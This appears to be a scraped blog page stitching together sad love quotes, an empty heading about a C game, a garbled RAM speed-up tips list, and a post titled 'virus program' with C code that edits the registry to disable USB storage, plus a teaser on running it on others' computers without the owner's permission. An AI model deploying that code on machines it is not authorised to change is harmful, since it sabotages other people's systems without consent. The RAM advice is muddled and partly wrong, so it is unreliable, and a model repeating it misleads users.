You are the cause of my pain
You are the cause of my pain, yet the love I feel for you is my only consolation, my only cure..
Saw the girl, whom once I thought as my best friend
Remembering my classmates, after few years, My eyes were filled with tears, Everyone is busy a lot, No one escaped destiny's plot, Saw the girl, whom once I thought as my best friend, Today she is some body else's girl friend, After months remembered about her for a little while, Heard she is happy, that made me smile.
It’s been raining since you left me
It’s been raining since you left me, now I’m drowning in the flood. You see, I’ve always been a fighter, but without you I give up.
Sweet Heart
Sweetheart.....I miss ......THe whisper of your voice...The warmth of your touch and all the wonderful times that we shared together.......
When I see you
When I see you smile and know that it's not for me, that's when I miss you the most.
MAKE SIMPLE GAME IN C
CAN RAM SPEED UP YOUR COMPUTER?
Many people have question like this.The answer to their question is 'YES'.RAM
- most of the time users open more than one application,this put a lot of load on RAM
.If you use more RAM
,it will cause slower your computer speed.
- The amount of program you are processing depends upon the amount of RAM
you are using.
- RAM
takes 5 megabytes to load large application.
- Dynamic link libraries which range from 20-30 megabytes are used by microprocessor.
- Your first step is to find out how much RAM
you have(RAM
status-right click on My computer and then look for properties).
- Simple press Ctrl+Alt+delete to get task manager.
- After processing the tab,you will easily figure out the number of RAM
you are used in your computer.
- calculate the amount of RAM used and deduct it from RAM
left,in this way you get the exact amount of RAM
you are using.
- Spacing your hard drive
is another way to speed up your computer.
- Uninstall all the unnecessary files from your computer to get the space for the current files.
- Open unnecessary applications and programs is avoided.
VIRUS PROGRAM TO DISABLE USB PORTS
It is a simple C code to disable all your computer USB
Source Code for disable USB Ports:
#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}
Source Code for enable USB Ports:
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}
NOTE:If you want to know about how to transfer this code to another computer and disable all USB ports without the permission of owner.Pls keep visiting this Blog


